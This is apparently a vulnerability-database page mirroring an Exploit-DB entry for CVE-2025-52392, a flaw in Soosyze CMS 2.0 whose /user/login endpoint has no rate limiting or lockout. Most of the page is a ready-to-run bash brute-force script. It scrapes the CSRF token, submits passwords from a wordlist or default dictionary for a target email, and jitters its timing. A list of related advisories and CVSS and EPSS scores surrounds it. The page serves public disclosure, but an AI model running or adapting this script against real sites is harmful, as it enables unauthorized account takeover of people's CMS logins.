Soosyze CMS 2.0 - Brute Force Login

🗓️ 18 Aug 2025 00:00:00Reported by Beatriz Fresno NaumovaType

exploitdb🔗 www.exploit-db.com👁 278 Views

Soosyze CMS 2.0 brute force login on /user/login due to no rate limiting or lockout CVE-2025-52392

Reporter	Title	Published	Views	Family All 17
Circl	CVE-2025-52392	13 Aug 202517:01	–	circl
CNNVD	soosyze 安全漏洞	13 Aug 202500:00	–	cnnvd
CNVD	soosyze brute force login vulnerability	21 Aug 202500:00	–	cnvd
CVE	CVE-2025-52392	13 Aug 202500:00	–	cve
Cvelist	CVE-2025-52392	13 Aug 202500:00	–	cvelist
EUVD	EUVD-2025-24570	3 Oct 202520:07	–	euvd
Github Security Blog	Soosyze CMS's /user/login endpoint missing rate-limiting and lockout mechanisms	13 Aug 202515:30	–	github
NVD	CVE-2025-52392	13 Aug 202514:15	–	nvd
OSV	CVE-2025-52392	13 Aug 202514:15	–	osv
OSV	GHSA-VQ9X-W82R-RHMC Soosyze CMS's /user/login endpoint missing rate-limiting and lockout mechanisms	13 Aug 202515:30	–	osv

# Exploit Title: Soosyze CMS 2.0 - Brute Force Login
# Google Dork: N/A
# Date: 2025-08-13
# Exploit Author: Beatriz Fresno Naumova (beafn28)
# Vendor Homepage: https://soosyze.com/
# Software Link: https://github.com/soosyze/soosyze
# Version: 2.0 (tested)
# Tested on: macOS Sonoma 14.x (Apple Silicon M1), /bin/bash 3.2 & Homebrew bash 5.2, curl 8.x, BSD sed
# CVE : CVE-2025-52392

# Description:
# Soosyze CMS 2.0 allows brute-force login attacks via /user/login due to missing rate limiting
# and account lockout mechanisms. An attacker can submit unlimited POST requests with a known
# username/email and a password wordlist, potentially gaining unauthorized access (CWE-307).

# PoC Usage:
#   ./script.sh [wordlist.txt]
# If no wordlist is provided, a dictionary is used.

#!/usr/bin/env bash

set -euo pipefail

BASE_URL="http://localhost:8000"
LOGIN_PATH="/user/login"
EMAIL_FIELD="email"
PASS_FIELD="password"
TARGET_EMAIL="[email protected]"

WORDLIST_FILE="${1:-}"
DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1")

form_url="$BASE_URL$LOGIN_PATH"
COOKIE_JAR="$(mktemp)"

get_form() {
    curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html
}

extract_token() {
    local name value
    name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' /tmp/login_page.html | head -n1 || true)
    value=""
    if [[ -n "$name" ]]; then
        value=$(sed -nE "s/.*name=\"$name\".*value=\"([^\"]*)\".*/\1/p" /tmp/login_page.html | head -n1 || true)
    fi
    printf '%s\t%s\n' "$name" "$value"
}

post_login() {
    local pass="$1" tname="$2" tval="$3"
    curl -sS -o /tmp/resp.html -w "%{http_code}" \
        -c "$COOKIE_JAR" -b "$COOKIE_JAR" \
        -X POST "$form_url" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Origin: $BASE_URL" -H "Referer: $form_url" \
        --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" \
        --data-urlencode "$PASS_FIELD=$pass" \
        $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" )
}

echo "[*] Starting brute-force attack on $form_url"
[[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}")

i=0
for pw in "${words[@]}"; do
    i=$((i+1))
    get_form
    IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token)
    code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE")

    if grep -q '"redirect"' /tmp/resp.html; then
        echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)"
        break
    else
        echo "[$i] '$pw' (HTTP $code)"
    fi

    sleep 0.$((RANDOM%9+1))
done

rm -f "$COOKIE_JAR" /tmp/resp.html

18 Aug 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.15.4

EPSS0.01636

SSVC